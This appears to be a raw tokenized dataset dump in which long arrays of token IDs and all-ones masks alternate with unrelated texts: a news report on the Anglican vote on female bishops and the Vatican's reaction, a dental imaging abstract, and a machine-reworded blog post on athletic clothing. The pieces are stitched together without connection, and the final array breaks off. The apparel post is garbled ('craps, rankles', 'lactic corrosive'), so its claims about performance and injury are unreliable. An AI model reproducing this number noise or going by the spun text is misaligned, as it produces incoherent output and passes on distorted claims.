15899, 304, 4808, 777, 29871, 29929, 29906, 29900, 7284, 2594, 2674, 29879, 310, 17182, 29889, 1094, 760, 310, 278, 29380, 14511, 1230, 29892, 382, 26719, 750, 7051, 2859, 304, 12020, 777, 395, 29941, 29889, 29953, 24464, 297, 22874, 362, 515, 278, 6121, 7881, 975, 29871, 29896, 29906, 2440, 29889, 13, 13, 29950, 24943, 29898, 29900, 17367, 29946, 29881, 29947, 29945, 29874, 29947, 29897, 13, 13, 22359, 13, 13, 29950, 24943, 29898, 29900, 17367, 29946, 29881, 29947, 29953, 29955, 29946, 29897, 13, 13, 29941, 19929, 583, 24776, 515, 851, 21475, 7560, 1014, 13, 13, 29950, 24943, 29898, 29900, 17367, 29946, 29881, 29947, 29955, 29953, 29946, 29897, 13, 13, 29928, 1536, 24776, 278, 17873, 310, 2211, 310, 278, 29871, 29896, 29947, 2305, 2714, 304, 505, 6423, 633, 29877, 538, 263, 1014, 24556, 393, 269, 804, 297, 341, 3774, 1794, 4023, 4089, 29892, 385, 7560, 302, 5301, 805, 23195, 1171, 5429, 382, 1725, 29889, 13, 13, 1576, 5858, 674, 6773, 2745, 599, 278, 17873, 526, 1476, 29892, 349, 29889, 29963, 29889, 29903, 29889, 12178, 728, 1497, 29889, 13, 13, 8809, 488, 1784, 310, 278, 17616, 8745, 304, 454, 481, 964, 278, 4094, 29892, 2211, 13049, 322, 29871, 29896, 29945, 14892, 943, 892, 1020, 2986, 633, 29877, 538, 278, 2977, 295, 29899, 13519, 287, 2672, 29903, 317, 513, 29882, 332, 557, 845, 557, 746, 372, 269, 804, 297, 278, 591, 29872, 6199, 310, 15050, 4515, 3250, 1156, 263, 3974, 322, 3196, 20389, 1080, 29889, 13, 13, 1576, 29871, 29896, 29953, 29899, 6360, 29899, 1025, 317, 513, 29882, 332, 557, 845, 557, 29892, 263, 10637, 29899, 26350, 21239, 29892, 1090, 29893, 296, 385, 395, 29947, 29900, 7284, 975, 2350, 352, 1494, 263, 6339, 29871, 29906, 29900, 29896, 29900, 3974, 393, 2175, 697, 14892, 272, 7123, 322, 1023, 4045, 28606, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
The General Synod, the Anglican Church’s governing body, passed the resolution Monday night, ignoring traditionalists who say that Jesus wanted only men in Church leadership positions, reported CNN. Reformists pointed to Anglicans in Canada, the United States and New Zealand, which already allow female bishops, in arguing that women in the church should be appointed to positions of power. But some traditionalists now say that they will leave the Anglican Church for the Roman Catholic Church. The Vatican, which ruled in May that anyone ordaining female priests would be excommunicated, said in a statement Tuesday that the Anglican Church’s move in the opposite direction “is a rift to the apostolic tradition” of ordaining only men as bishops. It also expressed concern that the decision would affect relations between Anglicans and Roman Catholics, which have been strained over issues such as gay Anglican clergy but have been making an effort to hold dialogues in recent years, and is set to be a central topic of the Lambeth Conference, a decennial convention of Anglican and Episcopal bishops scheduled to start later this month. “This decision will have consequences on the dialogue which had brought good fruits,” the statement said. Reuters reported that the Church adopted compromise measures to appease traditionalists’ concerns over women being ordained as bishops. The Episcopal Church, the American branch of the Anglican Communion, has had a female bishop, Katharine Jefferts Schori, as its head since June 2006. According to the Roman Catholic Church, women should not be priests because Christ chose men to be his apostles. In May 2008, it ruled that those who attempt to ordain women as priests would be automatically excommunicated. The Church of England started ordaining women as priests in 1992. In June, traditionalist Episcopal bishops were planning to skip a decennial policy conference over the issue of same-sex marriages. “Some Anglican and Episcopal churches have been quietly accepting church blessings of same-sex couples for some time. And in 2003, the Episcopal Church ordained openly gay bishop V. Gene Robinson in New Hampshire,” findingDulcinea reports. The Episcopal Church is the U.S. branch of the Anglican Communion. The Anglican/Episcopalian faith boasts about 70 million adherents around the globe and is thought to fall somewhere in between Catholicism and Protestantism on the theological spectrum.
[ 1, 450, 4593, 10829, 397, 29892, 278, 3218, 506, 273, 6291, 30010, 29879, 14765, 1076, 3573, 29892, 4502, 278, 10104, 27822, 4646, 29892, 5330, 8253, 13807, 2879, 1058, 1827, 393, 13825, 5131, 871, 1757, 297, 6291, 26001, 11909, 29892, 8967, 29696, 29889, 13, 13, 1123, 689, 2879, 11520, 304, 3218, 506, 550, 297, 7400, 29892, 278, 3303, 3900, 322, 1570, 13450, 29892, 607, 2307, 2758, 12944, 289, 728, 3554, 29892, 297, 1852, 26420, 393, 5866, 297, 278, 6586, 881, 367, 10658, 304, 11909, 310, 3081, 29889, 1205, 777, 13807, 2879, 1286, 1827, 393, 896, 674, 5967, 278, 3218, 506, 273, 6291, 363, 278, 5917, 11865, 6291, 29889, 13, 13, 1576, 478, 271, 2185, 29892, 607, 29490, 297, 2610, 393, 5019, 4356, 17225, 12944, 3691, 9197, 723, 367, 429, 27820, 630, 29892, 1497, 297, 263, 3229, 323, 1041, 3250, 393, 278, 3218, 506, 273, 6291, 30010, 29879, 4337, 297, 278, 11564, 5305, 1346, 275, 263, 364, 2027, 304, 278, 18115, 324, 293, 11399, 30024, 310, 4356, 17225, 871, 1757, 408, 289, 728, 3554, 29889, 739, 884, 13384, 5932, 393, 278, 10608, 723, 6602, 5302, 1546, 3218, 506, 550, 322, 5917, 315, 6347, 1199, 29892, 607, 505, 1063, 5312, 1312, 975, 5626, 1316, 408, 23852, 3218, 506, 273, 28238, 1927, 541, 505, 1063, 3907, 385, 7225, 304, 4808, 7928, 1041, 297, 7786, 2440, 29892, 322, 338, 731, 304, 367, 263, 6555, 11261, 310, 278, 26832, 621, 16377, 29892, 263, 1602, 2108, 616, 15687, 310, 3218, 506, 273, 322, 20981, 9708, 284, 289, 728, 3554, 21467, 304, 1369, 2678, 445, 4098, 29889, 13, 13, 30015, 4013, 10608, 674, 505, 27721, 373, 278, 7928, 434, 607, 750, 6296, 1781, 285, 21211, 3995, 278, 3229, 1497, 29889, 13, 13, 1123, 329, 414, 8967, 393, 278, 6291, 16356, 19632, 895, 15366, 304, 5929, 559, 13807, 2879, 30010, 21838, 975, 5866, 1641, 4356, 7114, 408, 289, 728, 3554, 29889, 450, 20981, 9708, 284, 6291, 29892, 278, 3082, 5443, 310, 278, 3218, 506, 273, 1876, 13094, 29892, 756, 750, 263, 12944, 26201, 29892, 19663, 279, 457, 435, 1389, 571, 1372, 1102, 4170, 29892, 408, 967, 2343, 1951, 5306, 29871, 29906, 29900, 29900, 29953, 29889, 13, 13, 7504, 3278, 304, 278, 5917, 11865, 6291, 29892, 5866, 881, 451, 367, 3691, 9197, 1363, 2819, 12784, 1757, 304, 367, 670, 18115, 793, 29889, 512, 2610, 29871, 29906, 29900, 29900, 29947, 29892, 372, 29490, 393, 1906, 1058, 4218, 304, 4356, 475, 5866, 408, 3691, 9197, 723, 367, 6336, 429, 27820, 630, 29889, 450, 6291, 310, 5408, 4687, 4356, 17225, 5866, 408, 3691, 9197, 297, 29871, 29896, 29929, 29929, 29906, 29889, 13, 13, 797, 5306, 29892, 13807, 391, 20981, 9708, 284, 289, 728, 3554, 892, 18987, 304, 14383, 263, 1602, 2108, 616, 8898, 21362, 975, 278, 2228, 310, 1021, 29899, 14167, 1766, 374, 1179, 29889, 1346, 9526, 3218, 506, 273, 322, 20981, 9708, 284, 26014, 505, 1063, 25970, 25967, 6586, 17065, 886, 310, 1021, 29899, 14167, 3581, 2701, 363, 777, 931, 29889, 1126, 297, 29871, 29906, 29900, 29900, 29941, 29892, 278, 20981, 9708, 284, 6291, 4356, 7114, 1722, 368, 23852, 26201, 478, 29889, 15350, 22265, 297, 1570, 7904, 28401, 3995, 9138, 29928, 352, 29883, 16736, 13676, 29889, 13, 13, 1576, 20981, 9708, 284, 6291, 338, 278, 501, 29889, 29903, 29889, 5443, 310, 278, 3218, 506, 273, 1876, 13094, 29889, 450, 3218, 506, 273, 29914, 29923, 3334, 9708, 284, 713, 10847, 1045, 19416, 1048, 29871, 29955, 29900, 7284, 594, 2276, 1237, 2820, 278, 15482, 915, 322, 338, 2714, 304, 6416, 9051, 297, 1546, 11865, 1608, 322, 21723, 424, 1608, 373, 278, 278, 5996, 18272, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Parallelized Bayesian inversion for three-dimensional dental X-ray imaging. Diagnostic and operational tasks based on dental radiology often require three-dimensional (3-D) information that is not available in a single X-ray projection image. Comprehensive 3-D information about tissues can be obtained by computerized tomography (CT) imaging. However, in dental imaging a conventional CT scan may not be available or practical because of high radiation dose, low-resolution or the cost of the CT scanner equipment. In this paper, we consider a novel type of 3-D imaging modality for dental radiology. We consider situations in which projection images of the teeth are taken from a few sparsely distributed projection directions using the dentist's regular (digital) X-ray equipment and the 3-D X-ray attenuation function is reconstructed. A complication in these experiments is that the reconstruction of the 3-D structure based on a few projection images becomes an ill-posed inverse problem. Bayesian inversion is a well suited framework for reconstruction from such incomplete data. In Bayesian inversion, the ill-posed reconstruction problem is formulated in a well-posed probabilistic form in which a priori information is used to compensate for the incomplete information of the projection data. In this paper we propose a Bayesian method for 3-D reconstruction in dental radiology. The method is partially based on Kolehmainen et al. 2003. The prior model for dental structures consist of a weighted l1 and total variation (TV)-prior together with the positivity prior. The inverse problem is stated as finding the maximum a posteriori (MAP) estimate. To make the 3-D reconstruction computationally feasible, a parallelized version of an optimization algorithm is implemented for a Beowulf cluster computer. The method is tested with projection data from dental specimens and patient data. Tomosynthetic reconstructions are given as reference for the proposed method.
[ 1, 1459, 6553, 1891, 6211, 18970, 297, 3259, 363, 2211, 29899, 12531, 12042, 284, 1060, 29899, 764, 6382, 292, 29889, 13, 12130, 21780, 322, 1751, 1288, 9595, 2729, 373, 12042, 284, 17937, 3002, 4049, 1996, 2211, 29899, 12531, 313, 29941, 29899, 29928, 29897, 2472, 393, 338, 451, 3625, 297, 263, 2323, 1060, 29899, 764, 18246, 1967, 29889, 422, 1457, 29882, 6270, 29871, 29941, 29899, 29928, 2472, 1048, 260, 12175, 508, 367, 7625, 491, 6601, 1891, 6454, 5275, 313, 1783, 29897, 6382, 292, 29889, 2398, 29892, 297, 12042, 284, 6382, 292, 263, 28557, 26637, 12812, 1122, 451, 367, 3625, 470, 15031, 1363, 310, 1880, 27310, 437, 344, 29892, 4482, 29899, 9778, 918, 470, 278, 3438, 310, 278, 26637, 885, 7310, 21083, 29889, 512, 445, 5650, 29892, 591, 2050, 263, 9554, 1134, 310, 29871, 29941, 29899, 29928, 6382, 292, 878, 2877, 363, 12042, 284, 17937, 3002, 29889, 1334, 2050, 18845, 297, 607, 18246, 4558, 310, 278, 25287, 526, 4586, 515, 263, 2846, 805, 1503, 873, 13235, 18246, 18112, 773, 278, 12042, 391, 29915, 29879, 4943, 313, 7501, 2410, 29897, 1060, 29899, 764, 21083, 322, 278, 29871, 29941, 29899, 29928, 1060, 29899, 764, 472, 841, 29884, 362, 740, 338, 337, 11433, 287, 29889, 319, 752, 1414, 297, 1438, 15729, 338, 393, 278, 17789, 4080, 310, 278, 29871, 29941, 29899, 29928, 3829, 2729, 373, 263, 2846, 18246, 4558, 7415, 385, 4486, 29899, 4752, 16402, 1108, 29889, 6211, 18970, 297, 3259, 338, 263, 1532, 480, 1573, 6890, 363, 17789, 4080, 515, 1316, 28907, 848, 29889, 512, 6211, 18970, 297, 3259, 29892, 278, 4486, 29899, 4752, 17789, 4080, 1108, 338, 883, 7964, 297, 263, 1532, 29899, 4752, 23950, 4695, 883, 297, 607, 263, 3691, 4170, 2472, 338, 1304, 304, 22874, 403, 363, 278, 28907, 2472, 310, 278, 18246, 848, 29889, 512, 445, 5650, 591, 16193, 263, 6211, 18970, 1158, 363, 29871, 29941, 29899, 29928, 17789, 4080, 297, 12042, 284, 17937, 3002, 29889, 450, 1158, 338, 22039, 2729, 373, 476, 1772, 29882, 3396, 264, 634, 394, 29889, 29871, 29906, 29900, 29900, 29941, 29889, 450, 7536, 1904, 363, 12042, 284, 12286, 5718, 310, 263, 7688, 287, 301, 29896, 322, 3001, 19262, 313, 8050, 6817, 29886, 13479, 4208, 411, 278, 13686, 2068, 7536, 29889, 450, 16402, 1108, 338, 8703, 408, 9138, 278, 7472, 263, 13446, 29875, 313, 23827, 29897, 12678, 29889, 1763, 1207, 278, 29871, 29941, 29899, 29928, 17789, 4080, 16287, 635, 28326, 1821, 29892, 263, 8943, 1891, 1873, 310, 385, 13883, 5687, 338, 8762, 363, 263, 1522, 340, 16302, 9867, 6601, 29889, 450, 1158, 338, 9528, 411, 18246, 848, 515, 12042, 284, 1580, 326, 575, 322, 16500, 848, 29889, 4335, 359, 948, 386, 7492, 17789, 582, 1953, 526, 2183, 408, 3407, 363, 278, 7972, 1158, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Month: October 2017 Choosing the correct sort of garments is constantly essential. You can’t go for a formal meeting in your night robe nor would you be able to go to bed in your tuxedo. In this way, it is imperative to choose the correct apparel for every last event. Be it meeting, wedding, date, exercise center, games et cetera. Truly! You heard it right. It is imperative to wear right garments for a rec center session and keeping in mind that playing any games also. Asking why it is vital? Here are five reasons which will influence you to understand the significance of athletic apparel: Wearing the best possible athletic garments will support your certainty – The attire you wear will have a gigantic effect in your execution. This has been demonstrated by few investigations done all around the globe. Studies have demonstrated that wearing the correct garments has a positive effect and you have a tendency to perform better. Consequently, when you have the correct gear and you are wearing the correct garments, the certainty deciphers into better execution. Right games attire upgrades execution – Selecting the correct clothing is essential for any game you play. For example, a couple of running shoes is important for soccer. Yet, they are not suggested for couple of different games as they need adaptability, footing and horizontal strength which are required for different games. Likewise, attire that expels sweat from the body must be chosen. Rectify exercise hardware maintains a strategic distance from damage and includes insurance – One of the fundamental reasons of games related wounds is the utilization of shamefully fitted games gear. For instance utilization of shoes that don’t fit appropriately may cause craps, rankles or even elusive. Additionally some of them may require utilization of orthotic supplements to stay away from leg wounds. It is constantly prudent to change your shoes in the wake of utilizing them for 400 to 500 miles. The development of the body enhances when you wear the privilege fitted garments – It is imperative that the garments you wear give you opportunity of development with no hindrances. Your shirt or your shorts ought not be too tight that confines your development nor should they be too free that they slip each time you curve, turn or hop. Some pressure garments likewise encourages you to recoup from any damage after exercise – These pressure dress fortifies blood course. This graduated blood course through muscles expels the lactic corrosive which is created amid exercise. Therefore, the recuperation of the body increments and decreases the odds of having sore and hardened muscles. Wearing of pressure apparel gives an indistinguishable impact from rubbing.
[ 1, 23471, 29901, 5533, 29871, 29906, 29900, 29896, 29955, 13, 13, 15954, 14556, 278, 1959, 2656, 310, 7171, 1860, 338, 21003, 18853, 29889, 887, 508, 30010, 29873, 748, 363, 263, 11595, 11781, 297, 596, 4646, 696, 915, 3643, 723, 366, 367, 2221, 304, 748, 304, 6592, 297, 596, 260, 1314, 23162, 29889, 512, 445, 982, 29892, 372, 338, 10112, 1230, 304, 6755, 278, 1959, 623, 17243, 363, 1432, 1833, 1741, 29889, 1522, 372, 11781, 29892, 14837, 8497, 29892, 2635, 29892, 15058, 4818, 29892, 8090, 634, 274, 1308, 29874, 29889, 1605, 11850, 29991, 887, 6091, 372, 1492, 29889, 739, 338, 10112, 1230, 304, 19531, 1492, 7171, 1860, 363, 263, 1162, 4818, 4867, 322, 12515, 297, 3458, 393, 8743, 738, 8090, 884, 29889, 26579, 292, 2020, 372, 338, 27131, 29973, 13, 13, 10605, 526, 5320, 9590, 607, 674, 9949, 366, 304, 2274, 278, 26002, 310, 28563, 293, 623, 17243, 29901, 13, 13, 29956, 799, 292, 278, 1900, 